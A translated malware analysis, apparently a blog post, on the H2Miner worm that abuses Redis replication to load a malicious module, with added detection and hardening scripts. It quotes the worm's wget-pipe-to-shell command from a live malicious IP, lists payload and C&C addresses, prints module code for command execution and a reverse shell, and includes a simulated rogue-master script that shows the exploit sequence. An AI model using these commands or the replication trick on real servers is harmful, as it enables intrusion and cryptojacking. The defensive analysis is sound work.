New outbreak of H2Miner worms found exploiting Redis RCE

A day ago one of my project servers was attacked by a very similar worm. While looking for an answer to the question "what was that?" I found a good article by the Alibaba Cloud Security team. Since I could not find this article on Habr, I decided to translate it especially for you <3

Introduction

Recently, the Alibaba Cloud security team discovered a sudden outbreak of H2Miner. This worm family uses unauthenticated or weak-password Redis instances as its entry point into your system. It then synchronizes its malicious module to the victim through master-slave replication, and finally downloads the malicious payload onto the attacked machine and executes malicious commands.

Previously, attacks on your machine were mostly carried out through scheduled tasks (cron jobs) or SSH keys written to your machine after the attacker had logged into Redis. Fortunately, that method often fails because of permission controls or differences between system versions. This malicious module loading method, however, lets the attacker execute commands directly or obtain a shell, which is far more dangerous for your system.

Given the large number of Redis servers exposed on the Internet (nearly 1 million), the Alibaba Cloud security team, as a friendly reminder, recommends that users do not expose Redis online, and that they regularly check the strength of their passwords and whether their instances have been compromised.

H2Miner

H2Miner is a mining botnet for Linux-based systems that can infect your host in several ways, including unauthorized access to Hadoop YARN and Docker, and the Redis remote command execution (RCE) weakness described below. The botnet works by downloading malicious scripts and malware onto your host, spreading laterally, and maintaining command-and-control (C&C) communication.

Redis RCE

This technique was presented by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports a module loading feature that lets users load compiled C shared objects into Redis to implement new Redis commands. This feature, while useful, has a weakness: in master-slave mode, files can be synchronized to the slave in fullresync mode. An attacker can abuse this to transfer a malicious .so file. Once the transfer is complete, the attacker loads the module into the attacked Redis instance and executes arbitrary commands.

Malware Worm Analysis

Recently, the Alibaba Cloud security team found that the number of H2Miner attacks has risen sharply. According to the analysis, the general course of the attack is as follows:


H2Miner uses Redis RCE for the whole attack. The attackers first scan for unprotected Redis servers or servers with weak passwords.

They then use the command config set dbfilename red2.so to change the name of the dump file. After that, the attackers issue the slaveof command to set the address of the master for master-slave replication.

When the attacked Redis instance establishes a master-slave connection with the malicious Redis server owned by the attacker, the attacker's master answers with fullresync and sends the infected file as the synchronization payload. The red2.so file is thereby written to the attacked machine. The attackers then load it with module load ./red2.so. The module can execute commands on behalf of the attacker or initiate a reverse connection (reverse shell) to gain access to the attacked machine.

/* Commands registered by the red2.so module: "system.exec" runs an
   attacker-supplied command, "system.rev" opens a reverse shell. */
if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;

After executing malicious commands such as /bin/sh -c wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1, the attacker resets the dump file name and unloads the system module to clean up traces. However, the red2.so file still remains on the attacked machine. Users are advised to watch for such suspicious files in the working directory of their Redis instance.
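To make the replication trick concrete, here is an added example (not code from the article and not the worm's code) that models both sides of the exchange in Python: the RESP encoding of the commands the attacker sends, the handshake a Redis replica performs (PING, REPLCONF, PSYNC), and a rogue master that answers PSYNC with FULLRESYNC followed by an arbitrary bulk string. The master address 203.0.113.10, the 40-character run id and the ELF-looking payload are constructed stand-ins; nothing here is a real module.

```python
"""Model of the Redis replication abuse described above (added example, not
code from the article or from the worm). resp_encode() produces the wire
format every Redis client uses; RogueMaster answers the handshake the way a
replica expects it answered; simulate_victim_replication() plays the
replica's side far enough to show what ends up on disk. The master address
203.0.113.10, the run id and the payload bytes are constructed."""


def resp_encode(args):
    """Encode a command as a RESP array of bulk strings."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        b = arg.encode() if isinstance(arg, str) else arg
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)


def resp_decode_array(data):
    """Decode one RESP array of bulk strings into a list of bytes."""
    lines = data.split(b"\r\n")
    if not lines[0].startswith(b"*"):
        raise ValueError("not a RESP array")
    count, args, i = int(lines[0][1:]), [], 1
    for _ in range(count):
        if not lines[i].startswith(b"$"):
            raise ValueError("expected bulk string")
        args.append(lines[i + 1])
        i += 2
    return args


# The attacker's command sequence as the article describes it; "system" is the
# module name registered by red2.so.
ATTACK_SEQUENCE = [
    ["CONFIG", "SET", "dbfilename", "red2.so"],   # replication output lands under this name
    ["SLAVEOF", "203.0.113.10", "6379"],          # constructed rogue-master address
    ["MODULE", "LOAD", "./red2.so"],              # after FULLRESYNC has delivered the file
    ["CONFIG", "SET", "dbfilename", "dump.rdb"],  # cleanup: restore the dump file name
    ["MODULE", "UNLOAD", "system"],               # cleanup: remove the module
    ["SLAVEOF", "NO", "ONE"],
]


class RogueMaster:
    """A 'master' that serves an arbitrary blob where the replica expects an RDB."""

    def __init__(self, payload, run_id="a" * 40):  # constructed 40-char run id
        self.payload = payload
        self.run_id = run_id.encode()

    def handle(self, request):
        """Reply to one replica request (PING / REPLCONF / PSYNC)."""
        args = resp_decode_array(request)
        cmd = args[0].upper()
        if cmd == b"PING":
            return b"+PONG\r\n"
        if cmd == b"REPLCONF":
            return b"+OK\r\n"
        if cmd == b"PSYNC":
            # FULLRESYNC makes the replica read the next bulk string as a complete
            # RDB snapshot; it is written to <dir>/<dbfilename> as-is.
            return (b"+FULLRESYNC %s 0\r\n" % self.run_id
                    + b"$%d\r\n%s" % (len(self.payload), self.payload))
        return b"-ERR unknown command\r\n"


def simulate_victim_replication(master, dbfilename):
    """Run the replica's handshake against master; return ({dbfilename: bytes}, transcript)."""
    handshake = [["PING"], ["REPLCONF", "listening-port", "6379"],
                 ["REPLCONF", "capa", "eof"], ["PSYNC", "?", "-1"]]
    transcript = []
    for cmd in handshake:
        reply = master.handle(resp_encode(cmd))
        transcript.append((cmd, reply))
    status, rest = reply.split(b"\r\n", 1)          # "+FULLRESYNC <runid> <offset>"
    if not status.startswith(b"+FULLRESYNC"):
        raise RuntimeError("master refused full resync")
    length_line, body = rest.split(b"\r\n", 1)
    rdb = body[: int(length_line[1:])]
    # A real replica does not check that these bytes are an RDB before writing them.
    return {dbfilename: rdb}, transcript


if __name__ == "__main__":
    fake_so = b"\x7fELF" + b"\x00" * 28         # constructed stand-in for red2.so
    files, log = simulate_victim_replication(RogueMaster(fake_so), "red2.so")
    for cmd, reply in log:
        print(" ".join(cmd), "->", reply[:40])
    print("written:", {k: len(v) for k, v in files.items()})
```

The point the model makes is that the replica never validates the bulk body it receives after FULLRESYNC; it only tries to parse it as an RDB after it has already been written to disk under the current dbfilename. That is why config set dbfilename red2.so, issued before slaveof, turns ordinary replication into an arbitrary file write, and why the .so stays behind even after the RDB load fails and the attacker runs the cleanup commands.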

Besides killing competing malicious processes in order to take over their resources, the malicious script then downloads and executes a malicious binary from 142.44.191.122/kinsing. Hence a process name or directory name on the host containing "kinsing" can indicate that the machine has been infected by this worm.

According to the reverse engineering results, the malware mainly does the following:

  • Downloads files and executes them
  • Mines cryptocurrency
  • Maintains C&C communication and executes attack commands


The worm uses masscan for external scanning to extend its reach. In addition, the IP address of the C&C server is hard-coded in the program, and the attacked host communicates with the C&C server using HTTP requests, in which the zombie (compromised server) information is carried in HTTP headers:


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
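The header set above is a usable network signature. The following is an added example (not the article's code) of a small detector in Python: it parses a raw HTTP/1.x request, counts how many of the worm's non-standard headers are present, and also flags the contradiction visible in the captured request, a Windows browser User-Agent alongside "Os: linux". The two sample requests are constructed for the test; the host is a TEST-NET-3 address and the UUID is a placeholder, while the header names and the User-Agent string are the ones the article quotes.

```python
"""Detection for the H2Miner check-in shown above (added example, not the
article's code). classify_beacon() flags a raw HTTP request whose header set
matches the worm's beacon. The two sample requests are constructed: the host
is a TEST-NET-3 address and the UUID is a placeholder; the header names and
the Windows-browser User-Agent are the ones the article quotes."""

# Non-standard headers the beacon carries; no browser or common tool sends these.
BEACON_HEADERS = {"arch", "cores", "mem", "os", "osname", "osversion",
                  "root", "s", "uuid", "version"}
MIN_MATCHES = 6  # tolerate variants that drop or rename a few fields


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, {lowercase-name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_beacon(raw):
    """Return a finding dict for a worm check-in, or None for anything else."""
    method, path, headers = parse_request(raw)
    matched = BEACON_HEADERS & headers.keys()
    if len(matched) < MIN_MATCHES:
        return None
    ua = headers.get("user-agent", "")
    # The captured beacon claims a Windows browser while reporting Os: linux;
    # that contradiction is worth a rule of its own.
    ua_os_mismatch = "Windows" in ua and headers.get("os", "").lower() == "linux"
    return {
        "c2": headers.get("host", ""),
        "path": path,
        "uuid": headers.get("uuid", ""),
        "root": headers.get("root", ""),
        "matched_headers": sorted(matched),
        "ua_os_mismatch": ua_os_mismatch,
    }


def scan_requests(requests):
    """Classify every request in a list; returns only the findings."""
    return [f for f in (classify_beacon(r) for r in requests) if f]


# Constructed samples: one beacon mirroring the article's headers, one ordinary request.
SAMPLE_BEACON = (
    "GET /h HTTP/1.1\r\n"
    "Host: 203.0.113.7\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: 00000000-0000-0000-0000-000000000000\r\nVersion: 26\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: curl/7.64.0\r\nAccept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for finding in scan_requests([SAMPLE_BEACON, SAMPLE_BENIGN]):
        print(finding)
```

Matching on the header set rather than on the hard-coded C&C addresses keeps the rule useful when the operators rotate servers, which the IOC list below suggests they do; the Host header of a hit is then the current C&C address worth blocking.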

Other attack methods

(Figure: other attack methods used by H2Miner)

Addresses and links used by the worm

Scripts

  • 142.44.191.122/t.sh
  • 185.92.74.42/h.sh
  • 142.44.191.122/spr.sh
  • 142.44.191.122/spre.sh
  • 195.3.146.118/unk.sh

C&C

  • 45.10.88.102
  • 91.215.169.111
  • 139.99.50.255
  • 46.243.253.167
  • 195.123.220.193

Recommendations

First of all, Redis must not be reachable from the Internet and must be protected with a strong password. It is also important that users check that there is no red2.so file in the Redis directory and that there is no "kinsing" among the file or process names on the host.
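As an added example (not from the article), here is a Python audit that turns these recommendations into checks: audit_conf() reads a redis.conf and reports the settings the attack chain depends on (bind, protected-mode, requirepass, and whether CONFIG, SLAVEOF, MODULE and DEBUG are still reachable), and check_host_artifacts() looks for the file and process names the article gives as indicators. The two configs, the directory listing, the process list and the password value are constructed; the directives are real Redis 4/5 options.

```python
"""Audit helpers for the recommendations above (added example, not from the
article). audit_conf() reads a redis.conf and reports the exposures the worm
relies on; check_host_artifacts() looks for the file and process names the
article names as indicators. The two configs and the listings are constructed;
the directives are real Redis 4/5 options."""

IOC_NAMES = ("red2.so", "kinsing")
# Commands the attack chain needs. Redis 5+ also has REPLICAOF (an alias of
# SLAVEOF); add it here on 5+, but not on 4.x, where rename-command of an
# unknown command aborts startup.
DANGEROUS_COMMANDS = ("CONFIG", "SLAVEOF", "MODULE", "DEBUG")


def parse_conf(text):
    """Map directive -> list of argument lists (rename-command may repeat)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_conf(text):
    """Return a list of findings; an empty list means every check passed."""
    conf = parse_conf(text)
    findings = []
    bind = conf.get("bind", [[]])[-1]
    if not bind or "0.0.0.0" in bind or "*" in bind or "::" in bind:
        findings.append("bind: listens on every interface")
    elif any(addr not in ("127.0.0.1", "::1") for addr in bind):
        findings.append("bind: reachable beyond loopback (%s)" % " ".join(bind))
    if conf.get("protected-mode", [["yes"]])[-1][0].lower() != "yes":
        findings.append("protected-mode: disabled")
    password = conf.get("requirepass", [[]])[-1]
    if not password or password[0] in ('""', "''"):
        findings.append("requirepass: no password set")
    elif len(password[0]) < 16:
        findings.append("requirepass: password shorter than 16 characters")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append("rename-command: %s still reachable" % cmd)
    return findings


def check_host_artifacts(redis_dir_listing, process_names):
    """Flag shared objects in the Redis data dir and the worm's process name."""
    hits = []
    for name in redis_dir_listing:
        low = name.lower()
        if low.endswith(".so") or any(ioc in low for ioc in IOC_NAMES):
            hits.append("file in Redis dir: %s" % name)
    for proc in process_names:
        if any(ioc in proc.lower() for ioc in IOC_NAMES):
            hits.append("suspicious process: %s" % proc)
    return hits


# Constructed samples: the exposed default-ish config and a hardened one.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
dir /var/lib/redis
requirepass 5d3f1c2a7b9e4f6a8c0d1e2f3a4b5c6d
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""
DIR_LISTING = ["dump.rdb", "red2.so"]            # constructed `ls` of the Redis dir
PROCESSES = ["redis-server", "kinsing", "sshd"]  # constructed process names

if __name__ == "__main__":
    print("weak:", audit_conf(WEAK_CONF))
    print("hardened:", audit_conf(HARDENED_CONF))
    print("host:", check_host_artifacts(DIR_LISTING, PROCESSES))
```

Renaming CONFIG and SLAVEOF to an empty string removes the two commands the attack needs before the module is even transferred, and renaming MODULE blocks the load step; keep in mind that the rename only helps applications that never legitimately need those commands, and that a leaked requirepass still gives an attacker everything the rest of the command set allows.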

Source: www.hab.com
